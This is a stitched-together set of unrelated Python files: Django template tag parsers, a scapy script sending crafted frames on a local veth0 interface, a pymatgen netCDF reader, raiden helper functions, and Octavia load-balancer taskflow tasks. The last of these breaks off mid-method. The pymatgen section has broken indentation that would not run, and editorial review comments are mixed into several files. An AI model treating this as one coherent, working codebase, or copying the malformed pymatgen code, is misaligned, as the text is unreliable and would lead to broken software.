            if context.template.engine.debug:
                raise
            return ''
@register.tag('block')
def do_block(parser, token):
    """
    Define a block that can be overridden by child templates.
    """
    # Variables aren't accepted as arguments here, so a plain whitespace
    # split is sufficient (no need for token.split_contents()).
    pieces = token.contents.split()
    if len(pieces) != 2:
        raise TemplateSyntaxError("'%s' tag takes only one argument" % pieces[0])
    block_name = pieces[1]
    # Track block names already seen in this template to reject duplicates.
    if not hasattr(parser, '__loaded_blocks'):
        parser.__loaded_blocks = [block_name]
    else:
        loaded = parser.__loaded_blocks
        if block_name in loaded:
            raise TemplateSyntaxError("'%s' tag with name '%s' appears more than once" % (pieces[0], block_name))
        loaded.append(block_name)
    nodelist = parser.parse(('endblock',))
    # Accept '{% endblock name %}' for backwards-compatibility. See #3100.
    endblock = parser.next_token()
    acceptable_endblocks = ('endblock', 'endblock %s' % block_name)
    if endblock.contents not in acceptable_endblocks:
        parser.invalid_block_tag(endblock, 'endblock', acceptable_endblocks)
    return BlockNode(block_name, nodelist)
@register.tag('extends')
def do_extends(parser, token):
    """
    Signal that this template extends a parent template.
    This tag may be used in two ways: ``{% extends "base" %}`` (with quotes)
    uses the literal value "base" as the name of the parent template to extend,
    or ``{% extends variable %}`` uses the value of ``variable`` as either the
    name of the parent template to extend (if it evaluates to a string) or as
    the parent template itself (if it evaluates to a Template object).
    """
    args = token.split_contents()
    if len(args) != 2:
        raise TemplateSyntaxError("'%s' takes one argument" % args[0])
    # The argument may be a quoted name, a variable, or a filter expression.
    parent_name = parser.compile_filter(args[1])
    # Consume the rest of the template; extends governs the whole file.
    nodelist = parser.parse()
    if nodelist.get_nodes_by_type(ExtendsNode):
        raise TemplateSyntaxError(
            "'%s' cannot appear more than once in the same template" % args[0])
    return ExtendsNode(nodelist, parent_name)
@register.tag('include')
def do_include(parser, token):
    """
    Loads a template and renders it with the current context. You can pass
    additional context using keyword arguments.
    Example::
        {% include "foo/some_include" %}
        {% include "foo/some_include" with bar="BAZZ!" baz="BING!" %}
    Use the ``only`` argument to exclude the current context when rendering
    the included template::
        {% include "foo/some_include" only %}
        {% include "foo/some_include" with bar="1" only %}
    """
    bits = token.split_contents()
    if len(bits) < 2:
        raise TemplateSyntaxError(
            "%r tag takes at least one argument: the name of the template to "
            "be included." % bits[0]
        )
    options = {}
    # Walk the options left to right; token_kwargs() consumes the tokens
    # belonging to a 'with' clause directly from this list.
    rest = bits[2:]
    while rest:
        option = rest.pop(0)
        if option in options:
            raise TemplateSyntaxError('The %r option was specified more '
                                      'than once.' % option)
        if option == 'only':
            value = True
        elif option == 'with':
            value = token_kwargs(rest, parser, support_legacy=False)
            if not value:
                raise TemplateSyntaxError('"with" in %r tag needs at least '
                                          'one keyword argument.' % bits[0])
        else:
            raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
                                      (bits[0], option))
        options[option] = value
    return IncludeNode(
        parser.compile_filter(bits[1]),
        extra_context=options.get('with', {}),
        isolated_context=options.get('only', False),
    )
|
|
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from scapy.all import sniff, sendp
from scapy.all import Packet
from scapy.all import ShortField, IntField, LongField, BitField
from scapy.all import Ether, IP, TCP
import networkx as nx
import sys
def main():
    """Send a fixed sequence of crafted Ether/IP frames on veth0.

    The script takes no command-line arguments.  Each (src, dst) pair in
    ``flows`` is emitted exactly once, in order, as an Ethernet frame
    (EtherType 0x0800) carrying an IP header and a tiny payload.
    """
    # sys.argv always contains the script name, so exactly 1 entry means
    # "no extra arguments were given".
    if len(sys.argv) != 1:
        print("Usage: send2.py")
        sys.exit(1)
    srcmac = '00:aa:bb:00:00:00'
    dstmac = '00:aa:bb:00:00:01'
    msg = 'hi'
    # (source IP, destination IP) pairs, sent in exactly this order.
    # Duplicates are intentional: repeated flows exercise whatever flow
    # table / counter logic sits behind veth0.
    flows = [
        ('111.37.250.218', '3.248.234.184'),
        ('142.54.3.18', '35.240.203.247'),
        ('112.119.163.206', '1.102.89.68'),
        ('111.37.250.218', '3.248.234.184'),
        ('205.38.229.41', '66.216.25.163'),
        ('43.255.233.20', '221.46.220.203'),
        ('6.172.207.28', '208.89.117.253'),
        ('43.139.101.173', '1.0.3.222'),
        ('148.92.117.249', '1.102.127.50'),
        ('194.253.242.112', '153.193.46.216'),
        ('111.37.250.218', '3.248.234.184'),
        ('43.255.233.20', '221.46.220.203'),
        ('111.37.250.218', '3.248.234.184'),
        ('113.169.241.172', '1.96.222.132'),
        ('30.187.70.176', '1.96.166.240'),
        ('129.201.147.168', '43.239.238.254'),
        ('43.255.233.20', '221.46.220.203'),
        ('15.83.232.209', '153.193.117.43'),
        ('117.91.221.69', '1.96.228.67'),
        ('112.65.110.243', '1.96.222.237'),
        ('153.193.150.99', '221.46.220.227'),
        ('43.255.233.20', '221.46.220.203'),
        ('43.255.233.20', '221.46.220.203'),
        ('153.193.150.99', '221.46.220.227'),
        ('122.138.7.7', '3.151.114.131'),
        ('197.78.57.215', '66.216.25.163'),
        ('43.255.233.20', '221.46.220.203'),
        ('207.137.47.98', '1.96.223.52'),
        ('116.209.201.217', '66.216.25.163'),
        ('111.37.250.218', '3.248.234.184'),
        ('205.38.229.188', '66.216.25.163'),
        ('207.157.173.33', '1.96.167.17'),
        ('153.193.150.99', '221.46.220.227'),
        ('39.183.184.70', '1.96.167.9'),
        ('194.253.242.112', '153.193.46.216'),
        ('43.255.233.20', '221.46.220.203'),
        ('173.162.174.71', '102.14.133.117'),
        ('43.139.101.102', '1.34.248.21'),
        ('102.1.84.90', '43.206.171.27'),
        ('153.193.150.99', '221.46.220.227'),
        ('128.25.115.194', '1.96.167.56'),
        ('111.229.0.142', '5.252.90.214'),
        ('128.29.115.116', '1.96.223.248'),
        ('111.37.250.218', '3.248.234.184'),
        ('153.193.150.99', '221.46.220.227'),
        ('207.137.52.25', '1.96.166.173'),
        ('102.6.32.157', '221.46.220.102'),
        ('102.6.32.157', '221.46.220.102'),
        ('100.159.187.56', '208.89.121.171'),
        ('183.190.174.107', '1.150.209.83'),
        ('111.209.150.229', '210.108.56.240'),
        ('109.147.8.232', '1.2.38.184'),
        ('128.37.184.30', '1.96.223.239'),
        ('153.193.150.99', '221.46.220.227'),
        ('116.209.201.171', '66.216.25.163'),
        ('102.0.115.0', '111.205.228.129'),
        ('43.255.233.20', '221.46.220.203'),
        ('205.38.229.94', '66.216.25.163'),
        ('197.78.57.35', '66.216.25.163'),
        ('112.111.179.170', '1.96.223.36'),
        ('153.193.150.99', '221.46.220.227'),
        ('184.21.123.130', '211.106.242.60'),
        ('117.92.23.134', '1.45.68.235'),
        ('153.193.150.99', '221.46.220.227'),
        ('112.111.179.170', '1.96.223.36'),
        ('194.253.242.112', '153.193.46.216'),
        ('43.255.233.20', '221.46.220.203'),
        ('43.139.101.123', '1.81.56.123'),
        ('153.193.150.99', '221.46.220.227'),
        ('13.1.149.6', '1.96.164.152'),
        ('153.193.150.99', '221.46.220.227'),
        ('128.37.184.30', '1.96.223.239'),
        ('43.139.101.102', '1.13.5.138'),
        ('119.10.57.179', '43.233.106.124'),
        ('153.193.150.99', '221.46.220.227'),
        ('204.103.13.219', '221.46.221.163'),
        ('43.255.233.20', '221.46.220.203'),
        ('128.61.59.69', '1.96.223.133'),
        ('43.139.101.170', '1.0.227.102'),
        ('113.181.185.162', '1.39.174.181'),
        ('73.149.65.226', '210.108.49.161'),
        ('43.255.233.20', '221.46.220.203'),
        ('119.238.4.231', '1.96.167.6'),
        ('130.77.108.26', '1.146.59.107'),
        ('153.193.150.99', '221.46.220.227'),
        ('207.157.173.33', '1.96.167.17'),
        ('119.236.185.197', '1.96.223.248'),
        ('130.77.108.26', '1.146.59.107'),
        ('74.90.63.201', '210.108.56.240'),
    ]
    for src_ip, dst_ip in flows:
        p = Ether(src=srcmac, dst=dstmac, type=0x0800) / \
            IP(src=src_ip, dst=dst_ip) / msg
        sendp(p, iface="veth0", verbose=0)


if __name__ == '__main__':
    main()
|
|
# coding: utf-8
"""Wrapper for netCDF readers."""
from __future__ import unicode_literals, division, print_function
import os.path
from monty.dev import requires, deprecated
from monty.collections import AttrDict
from monty.functools import lazy_property
from pymatgen.core.units import ArrayWithUnit
from pymatgen.core.structure import Structure
import logging
logger = logging.getLogger(__name__)
__author__ = "Matteo Giantomassi"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Matteo Giantomassi"
__email__ = "gmatteo at gmail.com"
__status__ = "Development"
__date__ = "$Feb 21, 2013M$"
__all__ = [
"as_ncreader",
"as_etsfreader",
"NetcdfReader",
"ETSF_Reader",
"structure_from_ncdata",
]
try:
import netCDF4
except ImportError:
netCDF4 = None
def _asreader(file, cls):
closeit = False
if not isinstance(file, cls):
file, closeit = cls(file), True
return file, closeit
def as_ncreader(file):
    """
    Convert file into a NetcdfReader instance.
    Returns reader, closeit where closeit is set to True
    if we have to close the file before leaving the procedure.
    """
    return _asreader(file, NetcdfReader)


def as_etsfreader(file):
    """Convert file into an ETSF_Reader instance.

    Returns (reader, closeit); closeit is True when the reader was
    opened here and the caller must close it before returning.
    """
    return _asreader(file, ETSF_Reader)
class NetcdfReaderError(Exception):
    """Base error class for NetcdfReader"""


# Sentinel class (used as a value, never instantiated) marking "no default
# supplied" so that None remains a legal default for read_value.
class NO_DEFAULT(object):
    """Signal that read_value should raise an Error"""
class NetcdfReader(object):
    """
    Wraps and extends netCDF4.Dataset. Read only mode. Supports with statements.

    Additional documentation available at:
        http://netcdf4-python.googlecode.com/svn/trunk/docs/netCDF4-module.html
    """
    # All reader failures are surfaced through this type so callers can
    # catch reader.Error regardless of the underlying netCDF4 exception.
    Error = NetcdfReaderError

    @requires(netCDF4 is not None, "netCDF4 must be installed to use this class")
    def __init__(self, path):
        """Open the Netcdf file specified by path (read mode)."""
        self.path = os.path.abspath(path)
        try:
            self.rootgrp = netCDF4.Dataset(self.path, mode="r")
        except Exception as exc:
            raise self.Error("In file %s: %s" % (self.path, str(exc)))
        # Number of walk_tree yields: one per group whose children are
        # listed, so a file with only the root group gives ngroups == 1
        # (ETSF_Reader.read_structure relies on this).
        self.ngroups = len(list(self.walk_tree()))
        #self.path2group = collections.OrderedDict()
        #for children in self.walk_tree():
        #    for child in children:
        #        #print(child.group, child.path)
        #        self.path2group[child.path] = child.group

    def __enter__(self):
        """Activated when used in the with statement."""
        return self

    def __exit__(self, type, value, traceback):
        """Activated at the end of the with statement. It automatically closes the file."""
        self.rootgrp.close()

    def close(self):
        # Best-effort close: a failure is logged, never raised.
        try:
            self.rootgrp.close()
        except Exception as exc:
            logger.warning("Exception %s while trying to close %s" % (exc, self.path))

    #@staticmethod
    #def pathjoin(*args):
    #    return "/".join(args)

    def walk_tree(self, top=None):
        """
        Navigate all the groups in the file starting from top.
        If top is None, the root group is used.

        Yields the list of child groups of each visited group (depth-first).
        """
        if top is None:
            top = self.rootgrp
        values = top.groups.values()
        yield values
        for value in top.groups.values():
            for children in self.walk_tree(value):
                yield children

    def print_tree(self):
        # Debug helper: print every group found in the file.
        for children in self.walk_tree():
            for child in children:
                print(child)

    def read_dimvalue(self, dimname, path="/"):
        """Returns the value of a dimension."""
        dim = self._read_dimensions(dimname, path=path)[0]
        return len(dim)

    def read_varnames(self, path="/"):
        """List of variable names stored in the group specified by path."""
        if path == "/":
            return self.rootgrp.variables.keys()
        else:
            # NOTE(review): self.path2group is never populated (the code
            # building it in __init__ is commented out), so any non-root
            # path raises AttributeError here -- confirm before using
            # group paths.
            group = self.path2group[path]
            return group.variables.keys()

    def read_value(self, varname, path="/", cmode=None, default=NO_DEFAULT):
        """
        Returns the values of variable with name varname in the group specified by path.

        Args:
            varname: Name of the variable
            path: path to the group.
            cmode: if cmode=="c", a complex ndarrays is constructed and returned
                (netcdf does not provide native support from complex datatype).
            default: read_value returns default if varname is not present.

        Returns:
            numpy array if varname represents an array, scalar otherwise.
        """
        try:
            var = self.read_variable(varname, path=path)
        except self.Error:
            if default is NO_DEFAULT: raise
            return default
        if cmode is None:
            # scalar or array
            # getValue is not portable!
            try:
                return var.getValue()[0] if not var.shape else var[:]
            except IndexError:
                return var.getValue() if not var.shape else var[:]
        else:
            # Complex values are stored as an extra trailing axis of
            # length 2 holding (real, imag).
            assert var.shape[-1] == 2
            if cmode == "c":
                return var[...,0] + 1j*var[...,1]
            else:
                raise ValueError("Wrong value for cmode %s" % cmode)

    def read_variable(self, varname, path="/"):
        """Returns the variable with name varname in the group specified by path."""
        return self._read_variables(varname, path=path)[0]

    def _read_dimensions(self, *dimnames, **kwargs):
        # Internal: fetch dimension objects; KeyError is translated into
        # self.Error with file context.  Non-root paths depend on the
        # unset path2group attribute (see read_varnames note).
        path = kwargs.get("path", "/")
        try:
            if path == "/":
                return [self.rootgrp.dimensions[dname] for dname in dimnames]
            else:
                group = self.path2group[path]
                return [group.dimensions[dname] for dname in dimnames]
        except KeyError:
            raise self.Error("In file %s:\ndimnames %s, kwargs %s" % (self.path, dimnames, kwargs))

    def _read_variables(self, *varnames, **kwargs):
        # Internal: same contract as _read_dimensions, but for variables.
        path = kwargs.get("path", "/")
        try:
            if path == "/":
                return [self.rootgrp.variables[vname] for vname in varnames]
            else:
                group = self.path2group[path]
                return [group.variables[vname] for vname in varnames]
        except KeyError:
            raise self.Error("In file %s:\nvarnames %s, kwargs %s" % (self.path, varnames, kwargs))

    def read_keys(self, keys, dict_cls=AttrDict, path="/"):
        """
        Read a list of variables/dimensions from file. If a key is not present the corresponding
        entry in the output dictionary is set to None.
        """
        od = dict_cls()
        for k in keys:
            try:
                # Try to read a variable.
                od[k] = self.read_value(k, path=path)
            except self.Error:
                try:
                    # Try to read a dimension.
                    od[k] = self.read_dimvalue(k, path=path)
                except self.Error:
                    od[k] = None
        return od
class ETSF_Reader(NetcdfReader):
    """
    Reader for netcdf files written according to the ETSF-IO specifications.
    The file is assumed to contain at least the crystallographic section.
    """

    @lazy_property
    def chemical_symbols(self):
        """Chemical symbols char [number of atom species][symbol length]."""
        # Each row is one species; decode the bytes and collapse the
        # characters into a plain string.
        raw_rows = self.read_value("chemical_symbols")
        return [str("".join(row.decode("ascii"))) for row in raw_rows]

    def typeidx_from_symbol(self, symbol):
        """Returns the type index from the chemical symbol. Note python convention."""
        return self.chemical_symbols.index(symbol)

    def read_structure(self, cls=Structure):
        """Returns the crystalline structure."""
        # Multi-group files are not supported by this reader.
        if self.ngroups != 1:
            raise NotImplementedError("In file %s: ngroups != 1" % self.path)
        return structure_from_ncdata(self, cls=cls)
def structure_from_ncdata(ncdata, site_properties=None, cls=Structure):
    """
    Reads and returns a pymatgen structure from a NetCDF file
    containing crystallographic data in the ETSF-IO format.

    Args:
        ncdata: filename or NetcdfReader instance.
        site_properties: Dictionary with site properties.
        cls: The Structure class to instantiate.
    """
    ncdata, closeit = as_ncreader(ncdata)
    # TODO check whether atomic units are used
    lattice = ArrayWithUnit(ncdata.read_value("primitive_vectors"), "bohr").to("ang")
    red_coords = ncdata.read_value("reduced_atom_positions")
    natom = len(red_coords)
    znucl_type = ncdata.read_value("atomic_numbers")
    # type_atom[0:natom] --> index Between 1 and number of atom species
    type_atom = ncdata.read_value("atom_species")
    # Fortran to C index and float --> int conversion.
    species = natom * [None]
    for atom in range(natom):
        type_idx = type_atom[atom] - 1
        species[atom] = int(znucl_type[type_idx])
    d = {}
    if site_properties is not None:
        for prop in site_properties:
            # Bug fix: the original wrote d[property] (the builtin), so
            # every requested site property landed under one bogus key.
            d[prop] = ncdata.read_value(prop)
    structure = cls(lattice, species, red_coords, site_properties=d)
    # Quick and dirty hack.
    # I need an abipy structure since I need to_abivars and other methods.
    try:
        from abipy.core.structure import Structure as AbipyStructure
        structure.__class__ = AbipyStructure
    except ImportError:
        pass
    if closeit:
        ncdata.close()
    return structure
|
|
# -*- coding: utf-8 -*-
import os
import re
import sys
import string
import time
import gevent
from coincurve import PrivateKey
from ethereum.utils import remove_0x_head
from sha3 import keccak_256
import raiden
LETTERS = string.printable
def safe_address_decode(address):
    """Best-effort decode of a hex-encoded address to binary.

    Uses the Python 2 'hex' string codec; non-string input (TypeError) is
    returned unchanged.  Note the partial-update semantics: if the '0x'
    strip succeeds but the hex decode raises, the stripped (still hex)
    value is what gets returned.
    """
    try:
        address = safe_lstrip_hex(address)
        address = address.decode('hex')  # Python 2-only codec
    except TypeError:
        pass
    return address
def sha3(data):
    """Return the 32-byte Keccak-256 digest of *data*.

    Raises:
        RuntimeError: If Keccak lib initialization failed, or if the function
            failed to compute the hash.
        TypeError: This function does not accept unicode objects, they must be
            encoded prior to usage.
    """
    hasher = keccak_256(data)
    return hasher.digest()
def ishash(data):
    """Return True when *data* is a 32-byte binary value (e.g. a keccak digest)."""
    if not isinstance(data, (bytes, bytearray)):
        return False
    return len(data) == 32
def isaddress(data):
    """Return True when *data* is a 20-byte binary value (an Ethereum address)."""
    if not isinstance(data, (bytes, bytearray)):
        return False
    return len(data) == 20
def pex(data):
    """Short hex preview: first 8 hex chars of *data* (Python 2 'hex' codec)."""
    hexed = str(data).encode('hex')
    return hexed[:8]


def lpex(lst):
    """Apply pex to every element of *lst*."""
    return [pex(item) for item in lst]
def activate_ultratb():
    """Install IPython's verbose traceback (with pdb post-mortem) as the
    process-wide sys.excepthook.  Debugging aid only; requires IPython.
    """
    from IPython.core import ultratb
    sys.excepthook = ultratb.VerboseTB(call_pdb=True, tb_offset=6)
def host_port_to_endpoint(host, port):
    """Join *host* and *port* into a 'host:port' endpoint string."""
    return '%s:%s' % (host, port)
def split_endpoint(endpoint):
    """Split '[scheme://]host[:port]' into (host, port).

    Returns port as an int, or None when no port is present.
    Raises ValueError for strings that do not look like an endpoint.
    """
    parsed = re.match(r'(?:[a-z0-9]*:?//)?([^:/]+)(?::(\d+))?', endpoint, re.I)
    if parsed is None:
        raise ValueError('Invalid endpoint', endpoint)
    host, port = parsed.groups()
    return (host, int(port) if port else port)
def publickey_to_address(publickey):
    """Derive the 20-byte address: keccak of the pubkey (sans prefix byte), last 20 bytes."""
    digest = sha3(publickey[1:])
    return digest[12:]
def privatekey_to_address(private_key_bin):
    """Derive the address for a raw 32-byte private key.

    Raises ValueError when the key is not exactly 32 bytes (a common
    symptom of passing a hex-encoded key by mistake).
    """
    if len(private_key_bin) != 32:
        raise ValueError('private_key_bin format mismatch. maybe hex encoded?')
    uncompressed_pubkey = PrivateKey(private_key_bin).public_key.format(
        compressed=False)
    return publickey_to_address(uncompressed_pubkey)
def get_project_root():
    """Absolute directory that contains the installed raiden package."""
    return os.path.dirname(raiden.__file__)


def get_contract_path(contract_name):
    """Resolve *contract_name* inside raiden's smart_contracts directory."""
    relative = os.path.join(get_project_root(), 'smart_contracts', contract_name)
    return os.path.realpath(relative)
def safe_lstrip_hex(val):
    """Strip a leading '0x' from string values; pass anything else through."""
    if not isinstance(val, basestring):
        return val
    return remove_0x_head(val)
def get_encoded_transfers(their_transfer, our_transfer):
    """Check for input sanity and return the encoded version of the transfers"""
    # Supplying ours without theirs is a caller error.
    if our_transfer and not their_transfer:
        raise ValueError(
            'There is no reason to provide our_transfer when their_transfer'
            ' is not provided'
        )

    def _encode(transfer):
        # Falsy transfers encode to the empty string.
        return transfer.encode() if transfer else ''

    return _encode(their_transfer), _encode(our_transfer)
def camel_to_snake_case(name):
    """Convert a CamelCase identifier to snake_case."""
    partial = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
    return re.sub('([a-z0-9])([A-Z])', r'\1_\2', partial).lower()
def snake_to_camel_case(snake_string):
    """Convert snake_case to CamelCase (title-case each segment, drop underscores)."""
    return ''.join(snake_string.title().split('_'))
def channel_to_api_dict(channel):
    """Takes in a Channel Object and turns it into a dictionary for
    usage in the REST API. Decoding from binary to hex happens through
    the marshmallow AddressField in encoding.py.
    """
    straight_copy = (
        'channel_address',
        'token_address',
        'partner_address',
        'settle_timeout',
        'reveal_timeout',
        'state',
    )
    result = {name: getattr(channel, name) for name in straight_copy}
    # 'balance' deliberately reports the distributable amount.
    result['balance'] = channel.distributable
    return result
def fix_tester_storage(storage):
    """ pyethereum tester doesn't follow the canonical storage encoding:
    Both keys and values of the account storage associative array must be encoded with 64 hex
    digits. Also account_to_dict() from pyethereum can return 0x for a storage
    position. That is an invalid way of representing 0x0.

    Args:
        storage (dict): the storage dictionary from tester

    Returns:
        newstorage (dict): the canonical representation
    """
    # .items() instead of the Python 2-only .iteritems() keeps this
    # working on both Python 2 and 3; the bare '0x' key is normalized
    # to '0x0' before parsing.
    return {
        '0x%064x' % int(key if key != '0x' else '0x0', 16):
            '0x%064x' % int(val, 16)
        for key, val in storage.items()
    }
def get_system_spec():
    """Collect informations about the system and installation.
    """
    import pkg_resources
    import raiden
    import platform

    system_info = '{} {} {}'.format(
        platform.system(),
        '_'.join(platform.architecture()),
        platform.release()
    )
    return dict(
        raiden=pkg_resources.require(raiden.__name__)[0].version,
        python_implementation=platform.python_implementation(),
        python_version=platform.python_version(),
        system=system_info,
    )
def wait_until(func, wait_for=None, sleep_for=0.5):
    """Test for a function and wait for it to return a truth value or to timeout.
    Returns the value or None if a timeout is given and the function didn't return
    inside time timeout

    Args:
        func (callable): a function to be evaluated, use lambda if parameters are required
        wait_for (float, integer, None): the maximum time to wait, or None for an infinite loop
        sleep_for (float, integer): how much to gevent.sleep between calls

    Returns:
        func(): result of func, if truth value, or None"""
    res = func()
    if res:
        return res
    # A falsy wait_for means "poll forever".
    deadline = (time.time() + wait_for) if wait_for else None
    while not res:
        if deadline is not None and time.time() > deadline:
            break
        gevent.sleep(sleep_for)
        res = func()
    return res
|
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from cryptography import fernet
from oslo_config import cfg
from oslo_log import log as logging
from stevedore import driver as stevedore_driver
from taskflow import retry
from taskflow import task
from taskflow.types import failure
from octavia.amphorae.backends.agent import agent_jinja_cfg
from octavia.amphorae.driver_exceptions import exceptions as driver_except
from octavia.common import constants
from octavia.common import utils
from octavia.controller.worker import task_utils as task_utilities
from octavia.db import api as db_apis
from octavia.db import repositories as repo
from octavia.network import data_models
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class BaseAmphoraTask(task.Task):
    """Base task to load drivers common to the tasks."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Amphora driver is resolved through stevedore from the
        # configured controller_worker.amphora_driver entry point.
        self.amphora_driver = stevedore_driver.DriverManager(
            namespace='octavia.amphora.drivers',
            name=CONF.controller_worker.amphora_driver,
            invoke_on_load=True
        ).driver
        # DB repositories shared by all amphora tasks.
        self.amphora_repo = repo.AmphoraRepository()
        self.listener_repo = repo.ListenerRepository()
        self.loadbalancer_repo = repo.LoadBalancerRepository()
        self.task_utils = task_utilities.TaskUtils()
class AmpRetry(retry.Times):
    """Taskflow retry controller for amphora connection attempts."""

    def on_failure(self, history, *args, **kwargs):
        """Return RETRY while under the retry budget for retriable errors,
        otherwise REVERT_ALL.

        Retries when the last failure is an AmpConnectionRetry, or when
        no exception info could be restored from the persistence backend.
        """
        last_errors = history[-1][1]
        max_retry_attempt = CONF.haproxy_amphora.connection_max_retries
        for task_name, ex_info in last_errors.items():
            if len(history) <= max_retry_attempt:
                # When taskflow persistance is enabled and flow/task state is
                # saved in the backend. If flow(task) is restored(restart of
                # worker,etc) we are getting ex_info as None - we need to RETRY
                # task to check its real state.
                if ex_info is None or ex_info._exc_info is None:
                    return retry.RETRY
                excp = ex_info._exc_info[1]
                if isinstance(excp, driver_except.AmpConnectionRetry):
                    return retry.RETRY
        return retry.REVERT_ALL
class AmpListenersUpdate(BaseAmphoraTask):
    """Task to update the listeners on one amphora."""

    def execute(self, loadbalancer, amphora, timeout_dict=None):
        """Push the load balancer's listener config to a single amphora.

        On any failure the amphora is marked ERROR instead of raising, so
        this task never triggers a flow revert (see note below).
        """
        # Note, we don't want this to cause a revert as it may be used
        # in a failover flow with both amps failing. Skip it and let
        # health manager fix it.
        # TODO(johnsom) Optimize this to use the dicts and not need the
        # DB lookups
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora[constants.ID])
        try:
            db_lb = self.loadbalancer_repo.get(
                db_apis.get_session(),
                id=loadbalancer[constants.LOADBALANCER_ID])
            self.amphora_driver.update_amphora_listeners(
                db_lb, db_amp, timeout_dict)
        except Exception as e:
            LOG.error('Failed to update listeners on amphora %s. Skipping '
                      'this amphora as it is failing to update due to: %s',
                      db_amp.id, str(e))
            # Mark the amphora ERROR so the health manager can recover it.
            self.amphora_repo.update(db_apis.get_session(), db_amp.id,
                                     status=constants.ERROR)
class AmphoraIndexListenerUpdate(BaseAmphoraTask):
    """Task to update the listeners on one amphora."""

    # Consistency fix: the default was ``timeout_dict=()``; every sibling
    # task (AmpListenersUpdate, AmphoraIndexListenersReload) uses None,
    # and None is what the driver receives when no timeouts are given.
    def execute(self, loadbalancer, amphora_index, amphorae,
                timeout_dict=None):
        """Push the listener config to the amphora at *amphora_index*.

        On any failure the amphora is marked ERROR instead of raising, so
        this task never triggers a flow revert (see note below).
        """
        # Note, we don't want this to cause a revert as it may be used
        # in a failover flow with both amps failing. Skip it and let
        # health manager fix it.
        try:
            # TODO(johnsom) Optimize this to use the dicts and not need the
            # DB lookups
            db_amp = self.amphora_repo.get(
                db_apis.get_session(),
                id=amphorae[amphora_index][constants.ID])
            db_lb = self.loadbalancer_repo.get(
                db_apis.get_session(),
                id=loadbalancer[constants.LOADBALANCER_ID])
            self.amphora_driver.update_amphora_listeners(
                db_lb, db_amp, timeout_dict)
        except Exception as e:
            amphora_id = amphorae[amphora_index].get(constants.ID)
            LOG.error('Failed to update listeners on amphora %s. Skipping '
                      'this amphora as it is failing to update due to: %s',
                      amphora_id, str(e))
            # Mark the amphora ERROR so the health manager can recover it.
            self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                     status=constants.ERROR)
class ListenersUpdate(BaseAmphoraTask):
    """Task to update amphora with all specified listeners' configurations."""

    def execute(self, loadbalancer_id):
        """Execute updates per listener for an amphora."""
        loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
                                                  id=loadbalancer_id)
        if loadbalancer:
            self.amphora_driver.update(loadbalancer)
        else:
            LOG.error('Load balancer %s for listeners update not found. '
                      'Skipping update.', loadbalancer_id)

    def revert(self, loadbalancer_id, *args, **kwargs):
        """Handle failed listeners updates."""
        LOG.warning("Reverting listeners updates.")
        loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
                                                  id=loadbalancer_id)
        # NOTE(review): unlike execute(), there is no None-check here; a
        # missing load balancer would raise on .listeners — confirm the
        # revert path can only run with an existing record.
        for listener in loadbalancer.listeners:
            self.task_utils.mark_listener_prov_status_error(
                listener.id)
class ListenersStart(BaseAmphoraTask):
    """Task to start all listeners on the vip."""

    def execute(self, loadbalancer, amphora=None):
        """Execute listener start routines for listeners on an amphora."""
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
        # Only ask the driver to start when there is at least one listener.
        if db_lb.listeners:
            if amphora is not None:
                db_amp = self.amphora_repo.get(db_apis.get_session(),
                                               id=amphora[constants.ID])
            else:
                # None is forwarded to the driver unchanged.
                db_amp = amphora
            self.amphora_driver.start(db_lb, db_amp)
        LOG.debug("Started the listeners on the vip")

    def revert(self, loadbalancer, *args, **kwargs):
        """Handle failed listeners starts."""
        LOG.warning("Reverting listeners starts.")
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
        for listener in db_lb.listeners:
            self.task_utils.mark_listener_prov_status_error(listener.id)
class AmphoraIndexListenersReload(BaseAmphoraTask):
    """Task to reload all listeners on an amphora."""

    def execute(self, loadbalancer, amphora_index, amphorae,
                timeout_dict=None):
        """Execute listener reload routines for listeners on an amphora."""
        # Nothing to do when no amphorae were supplied.
        if amphorae is None:
            return
        # TODO(johnsom) Optimize this to use the dicts and not need the
        # DB lookups
        db_amp = self.amphora_repo.get(
            db_apis.get_session(), id=amphorae[amphora_index][constants.ID])
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(),
            id=loadbalancer[constants.LOADBALANCER_ID])
        if db_lb.listeners:
            try:
                self.amphora_driver.reload(db_lb, db_amp, timeout_dict)
            except Exception as e:
                amphora_id = amphorae[amphora_index][constants.ID]
                LOG.warning('Failed to reload listeners on amphora %s. '
                            'Skipping this amphora as it is failing to '
                            'reload due to: %s', amphora_id, str(e))
                # Mark ERROR and let the health manager recover it rather
                # than reverting the flow.
                self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                         status=constants.ERROR)
class ListenerDelete(BaseAmphoraTask):
    """Task to delete the listener on the vip."""

    def execute(self, listener):
        """Execute listener delete routines for an amphora."""
        listener_id = listener[constants.LISTENER_ID]
        session = db_apis.get_session()
        listener_obj = self.listener_repo.get(session, id=listener_id)
        self.amphora_driver.delete(listener_obj)
        LOG.debug("Deleted the listener on the vip")

    def revert(self, listener, *args, **kwargs):
